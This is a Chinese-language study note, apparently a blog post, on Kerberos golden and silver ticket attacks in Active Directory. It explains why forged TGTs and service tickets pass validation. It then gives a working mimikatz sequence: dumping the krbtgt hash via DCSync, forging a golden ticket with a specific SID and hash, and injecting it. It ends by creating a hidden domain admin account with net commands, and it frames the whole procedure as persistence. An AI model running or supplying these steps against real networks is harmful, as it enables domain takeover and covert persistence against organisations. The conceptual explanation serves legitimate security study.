- 票据是为了做一个权限维持
- 如果管理员更改密码了 可以用票据登录
- 黄金票据就是伪造的身份票据 是伪造的as颁发的TGT 身份票据
- 白银票据是伪造的服务票据 是伪造的tgs颁发的ST 服务票据
黄金票据
- 与KDC(密钥分发中心)交互 不与as交互
- 黄金票据伪造的就是TGT1 和TGT2
- 条件
1、域名称
2、域的SID值
3、域的KRBTGT账号的HASH
4、伪造任意用户名 - 为什么能骗过域控的tgs服务
- 因为伪造的是TGT1和TGT2
- TGT1中包含的session key(as)是伪造的 客户端的ntlm也是伪造的
- TGT2中包含的session key(as)也是伪造的 客户端信息是攻击者信息 域krbtgt的ntlm HASH已经知道了 加密的时候是用的真实的ntlm
- 生成的认证因子1其中的客户端信息是攻击者信息加密的方式也是session key(as)是伪造的
- 在第4步tgs解密TGT2的时候 得到的是伪造的session key(as) 用家的session key(as)解密认证因子 得到的客户端信息是攻击者的信息 与 TGT2中解密出的信息一致 接下来的步骤则都为真实了
白银票据
- 不与KDC交互 只与服务器交互
- 白银票据伪造的是tgs发送的ST 服务票据
- 条件
1.域名
2.域sid
3.目标服务器名
4.可利用的服务
5.服务账号的NTML HASH
6.需要伪造的用户名 - 为什么能骗过应用服务器
- 直接伪造的是TGT4和认证因子2
- TGT4中的session key(tgs)是伪造的 其中的客户端信息是攻击者信息 加密的服务的ntlm是真实的早知道的
- 认证因子2中的客户端信息是攻击者的 加密用的session key(tgs)是伪造的
- 服务器得到TGT4和认证因子2后解密TGT4 用的是自己的ntlm 与攻击者早得到的是一致的 所以解密成功 得到的sessions key(as)是伪造的
- 用伪造的sessions key(as)解密认证因子2一定能成功 得到的客户端信息与TGT4中的客户端信息相同 就直接提供服务了
黄金票据利用方式
1、在普通域用户中使用mimikatz生成黄金票据.kirbi文件并保存
要进入猕猴桃所在的目录 管理员打开
privilege::debug
lsadump::lsa /patch
mimikatz log "lsadump::dcsync /domain:xiusafe /user:krbtgt"//导出NTLM哈希
kerberos::golden /user:administrator /domain:xiusafe.com /sid:S-1-5-21-3818247987-2711466351-3365387365 /
krbtgt:5eadd5a4f3a4861f8e887310db890002 /ticket:ticket.kirbi
/user:需要伪造的域管理员用户
/domain:域名称
/sid:SID值,(这里要是使用系统命令的话抓到是这样的SID,最后面的值代表着这个账号的SID值,注意是去掉最后一个-后面的值!)
/krbtgt:krbtgt的HASH值
/ticket:生成的票据名称
2、清除票据
kerberos::purge \\清除票据
kerberos::tgt \\查看票据
3、导入票据
kerberos::ptt ticket.kirbi
4、创建域管
net user a !@#qwe123 /add /domain 创建域用户
net group "domain admins" a /add /domain 加入域控组
黄金票据与白银票据的区别
获取的权限不同
金票:伪造的TGT,可以获取任意Kerberos的访问权限
银票:伪造的ST,只能访问指定的服务,如CIFS
认证流程不同
金票:同KDC交互,但不同AS交互
银票:不同KDC交互,直接访问Server
加密方式不同
金票:由krbtgt NTLM Hash 加密
银票:由服务账号 NTLM Hash 加密
2463
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
